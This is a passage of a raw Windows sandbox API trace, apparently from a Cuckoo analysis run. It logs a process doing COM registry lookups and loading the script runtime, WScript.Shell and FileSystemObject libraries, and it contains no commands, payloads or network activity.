Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001aa DataLength => 100 ValueName => AppID Type => 1305712 |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW |
Handle => 0x000001aa Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x80000000 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001a2 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrLoadDll |
Flags => 1302488 BaseAddress => 0x5ce40000 FileName => C:\WINDOWS\system32\scrobj.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x5ce424c0 ModuleHandle => 0x5ce40000 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x5ce4180e ModuleHandle => 0x5ce40000 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtQueryInformationFile |
FileHandle => 0x00000174 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x0000019c FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013f220 SectionHandle => 0x0000019c ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000019c ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW |
Handle => 0x000001a0 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00o\x00r\x00a\x00r\x00y\x00 \x00I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => Cache |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000174 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtQueryValueKey |
KeyHandle => 0x00000174 ValueName => LogFileName |
FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 3 KeyHandle => 0x00000000 ObjectAttributes => \Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option |
FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | LdrLoadDll |
Flags => 1306164 BaseAddress => 0x7c800000 FileName => C:\WINDOWS\system32\kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NlsGetCacheUpdateCount FunctionAddress => 0x7c835831 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetCalendarInfoW FunctionAddress => 0x7c839038 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 33554432 KeyHandle => 0x00000174 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax |
FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 33554432 KeyHandle => 0x00000174 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => Control Panel\International\Calendars\TwoDigitYearMax |
FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00007000 BaseAddress => 0x0163a000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x01631000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateErrorInfo FunctionAddress => 0x77546b49 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetErrorInfo FunctionAddress => 0x7752993a ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SetErrorInfo FunctionAddress => 0x774feeaa ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW |
Handle => 0x00000174 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x80000000 SubKey => WScript.Shell |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x00000176 SubKey => CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW |
Handle => 0x000001a2 Data => {\x007\x002\x00C\x002\x004\x00D\x00D\x005\x00-\x00D\x007\x000\x00A\x00-\x004\x003\x008\x00B\x00-\x008\x00A\x004\x002\x00-\x009\x008\x004\x002\x004\x00B\x008\x008\x00A\x00F\x00B\x008\x00}\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW |
Handle => 0x00000174 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x00000174 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x000000f2 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x000001a2 Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x00000174 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x00000174 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x000000f2 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x0000019e Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x000001aa DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x000001aa Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x000001aa DataLength => 100 ValueName => AppID Type => 1305380 |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW |
Handle => 0x000001aa Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x000001aa |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000176 Registry => 0x80000000 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey |
Handle => 0x00000176 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrLoadDll |
Flags => 1302156 BaseAddress => 0x60280000 FileName => C:\WINDOWS\system32\wshom.ocx |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x60285fe1 ModuleHandle => 0x60280000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x60285fd7 ModuleHandle => 0x60280000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 1 FunctionName => FunctionAddress => 0x01001905 ModuleHandle => 0x01000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CLSIDFromProgIDEx FunctionAddress => 0x7755620d ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001b8 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x80000000 SubKey => scripting.FileSystemObject |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001be Registry => 0x000001ba SubKey => CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001be Data => {\x000\x00D\x004\x003\x00F\x00E\x000\x001\x00-\x00F\x000\x009\x003\x00-\x001\x001\x00C\x00F\x00-\x008\x009\x004\x000\x00-\x000\x000\x00A\x000\x00C\x009\x000\x005\x004\x002\x002\x008\x00}\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001b8 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001b8 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000000f2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001be Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001b8 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001b8 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000000f2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c2 Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001c6 DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001c6 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00r\x00u\x00n\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001c6 DataLength => 100 ValueName => AppID Type => 1305976 |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001c6 Data => B\x00o\x00t\x00h\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x80000000 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrLoadDll |
Flags => 1302856 BaseAddress => 0x735a0000 FileName => C:\WINDOWS\system32\scrrun.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x735a2861 ModuleHandle => 0x735a0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x735a2655 ModuleHandle => 0x735a0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SxsOleAut32RedirectTypeLibrary FunctionAddress => 0x7e746129 ModuleHandle => 0x7e720000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ba Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => {420B2830-E718-11CF-893D-00A0C9054228} |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001d2 Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001d2 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW |
Handle => 0x000001d2 Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW |
Handle => 0x000001d2 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00r\x00u\x00n\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\scrrun.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
